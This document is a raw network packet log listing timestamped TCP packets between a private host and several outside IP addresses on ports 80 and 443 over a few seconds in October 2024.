                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.871045113 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.871257067 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.873224020 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.873431921 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.873440027 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.873598099 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.875683069 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.875886917 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.875895977 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.876203060 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.878051996 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.878253937 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.878262043 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.878524065 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.880300999 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.880726099 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.880733967 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.881043911 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.882649899 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.883220911 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.883229017 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.883388042 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.884972095 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.885176897 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.885185957 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.885518074 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.887110949 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.887319088 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.887326956 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.887562037 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.889236927 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.889828920 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.890561104 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.890741110 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.890749931 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.891007900 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.892538071 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.892723083 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.892757893 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.893016100 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.894743919 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.895246983 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.895256042 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.895493031 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897219896 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897397041 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897406101 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897667885 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.898992062 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.899493933 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.899502993 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.899712086 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.901104927 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.901793957 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.901802063 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.902128935 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903083086 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903286934 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903350115 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903603077 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.904993057 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.905200005 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.905208111 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.905417919 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.906928062 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.907372952 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.907381058 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.907711029 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.908854961 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.909084082 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.909090996 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.909301996 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.910975933 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.911700010 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.911708117 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.911919117 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913131952 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913362980 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913371086 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913580894 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.914501905 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.914731026 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915503025 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915683031 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915689945 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915951014 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.917773008 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.918267012 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.918273926 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.918533087 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919106007 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919334888 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919342041 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919601917 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.920887947 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.921068907 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.921077967 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.921336889 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.922719002 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.922899008 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.922905922 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.923166037 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924418926 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924599886 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924633026 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924866915 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.926058054 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.926238060 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.926244974 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.926505089 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.928085089 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.928266048 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.928273916 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.928533077 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.929497004 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.929724932 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.929732084 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.929944038 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.931145906 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.931375027 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.931381941 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.931643009 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.932696104 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.932924986 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.932933092 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.933084011 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.934313059 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.934494019 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.934500933 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.934761047 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.935920000 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.936100006 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.936108112 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.936367989 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.937520981 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.937700987 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.937709093 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.937968969 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.939239025 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.939481020 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.939487934 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.939699888 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.940715075 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.940896034 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.940902948 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.941163063 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.942871094 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.943051100 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.943058968 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.943319082 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.943599939 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.943694115 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.943782091 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.943878889 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.944048882 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.944057941 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.757659912 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.962421894 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.962987900 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:13.962987900 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.167960882 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.168529034 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.172167063 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.377677917 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:14.425508022 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.019150972 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.019171953 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.019319057 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.021270037 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.021277905 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.220933914 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.221153975 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.223355055 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.223365068 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.223625898 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.226433039 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.268182993 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.822412968 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.822674990 CEST44349711172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.822863102 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.824980974 CEST49711443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:15.831007004 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.036747932 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.038073063 CEST49712443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.038095951 CEST44349712172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.038294077 CEST49712443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.038556099 CEST49712443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.038567066 CEST44349712172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.081454992 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.232530117 CEST44349712172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.238164902 CEST49712443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.238178968 CEST44349712172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.470714092 CEST44349712172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.470873117 CEST44349712172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.471003056 CEST49712443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.471304893 CEST49712443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.473608017 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.679282904 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.679919958 CEST49713443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.679940939 CEST44349713172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.680210114 CEST49713443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.680388927 CEST49713443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.680401087 CEST44349713172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.721926928 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.872946978 CEST44349713172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.874224901 CEST49713443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:16.874238014 CEST44349713172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.118752956 CEST44349713172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.118854046 CEST44349713172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.119023085 CEST49713443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.119267941 CEST49713443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.121479988 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.326919079 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.327538013 CEST49714443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.327558994 CEST44349714172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.327785969 CEST49714443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.327967882 CEST49714443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.327980042 CEST44349714172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.378031015 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.520704985 CEST44349714172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.522062063 CEST49714443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.522075891 CEST44349714172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.760497093 CEST44349714172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.760587931 CEST44349714172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.760739088 CEST49714443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.760971069 CEST49714443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.763058901 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.968271971 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.968877077 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.968897104 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.969099998 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.969372034 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.969383955 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.018459082 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.163074017 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.164352894 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.164366007 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.404596090 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.404683113 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.404911041 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.405118942 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.407128096 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.612593889 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613205910 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613228083 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613440037 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613636971 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613647938 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.658962011 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.808398008 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.809650898 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.809665918 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.047481060 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.047564983 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.047719002 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.048043966 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.057010889 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.262243032 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.262973070 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.262993097 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.263202906 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.263452053 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.263463020 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.315073967 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.457262039 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.459062099 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.459074020 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699117899 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699312925 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699448109 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699666977 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.701792955 CEST4971080192.168.11.20132.226.247.73
